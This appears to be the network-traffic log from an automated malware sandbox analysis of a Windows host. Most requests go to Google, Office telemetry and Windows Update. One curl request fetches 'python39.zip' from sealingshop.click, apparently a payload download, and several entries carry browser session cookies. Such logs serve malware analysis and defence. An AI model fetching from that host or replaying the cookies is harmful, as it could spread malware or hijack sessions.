Source: global traffic	HTTP traffic detected: GET /logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBBAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=1/ed=1/dg=3/br=1/rs=ACT90oHriNedtl0slfHQQK7yvtGqa3GaPw/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXJSm:ii1RGf;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RCF5Sd:X1kBmd;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UVzb9c:IvPZ6d;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;ZlOOMb:P0I0Ec;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;lbfkyf:MqGdUd;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;oVHXxc:HODIOb;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:ww04Df;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;ropkZ:UT1DG;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uuQkY:u2V3ud;vEYCNb:FaqsVd;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"se
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /app/python39.zip HTTP/1.1Host: sealingshop.clickUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nXZkSH4goDyyokB&MD=w198Tw2D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBBAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=1/ed=1/dg=3/br=1/rs=ACT90oHriNedtl0slfHQQK7yvtGqa3GaPw/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXJSm:ii1RGf;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RCF5Sd:X1kBmd;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UVzb9c:IvPZ6d;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;ZlOOMb:P0I0Ec;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;lbfkyf:MqGdUd;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;oVHXxc:HODIOb;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:ww04Df;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;ropkZ:UT1DG;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uuQkY:u2V3ud;vEYCNb:FaqsVd;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site
Source: global traffic	HTTP traffic detected: GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=7TpQZ5ybCP7V7M8PhYbCIQ.1733311218355&dpr=1&nolsbt=1 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/md=2/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBBAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/rs=ACT90oHriNedtl0slfHQQK7yvtGqa3GaPw HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en HTTP/1.1Host: ogs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=7TpQZ5ybCP7V7M8PhYbCIQ.1733311218355&dpr=1&nolsbt=1 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/ck=xjs.hd._XEEj3XSobE.L.B1.O/am=CKkCAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAEHQnAACYAGAXIEAAAAAAAAwAQBBAEAQACAEEEACsAAAQDgCgDACAAgAEIBSAR5kCowARQEAOACUAiR2AAFAgAgABAAHAADJoCEQFIAoAAAACAAAAAAIAAACGBBAIANABEAAGgEgAAEQPAgAAAAAIAgg4EwCGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/ujg=1/rs=ACT90oG2o4pmnD4w9tttYg6zVtJ0zPXSTw/m=sb_wiz,aa,abd,sy17h,syfu,syfl,syfj,syfk,syfm,syfv,syfw,syfq,syfr,syfp,syfo,syel,syfn,syfd,syfc,syfe,syfb,syfg,sy16c,syg6,sy17f,syyh,syg5,syg4,syg3,async,ifl,pHXghd,sf,syic,sy3jj,sonic,sy3jp,syhi,sygy,sy3j2,sy3j5,sy265,sydz,sy9w,sy9h,sy9g,spch,syte,sytd,rtH1bd,sy19c,sy15f,sy14w,sy125,syd8,sy19b,SMquOb,sy89,sy88,syez,syf8,syf6,syf5,syey,syew,syeu,sy83,sy80,sy82,syet,syex,syes,sybf,syba,sybd,syal,syar,syak,syaj,syai,sya6,sybb,syaz,syb0,syb6,syap,syb5,syay,syav,syag,syan,syb1,sya8,syaa,syab,sya7,syaq,syaf,syac,sybi,sya2,sy9z,sybh,sy9r,sy9j,sy9m,sy9y,sya5,syb2,syer,syeq,syen,s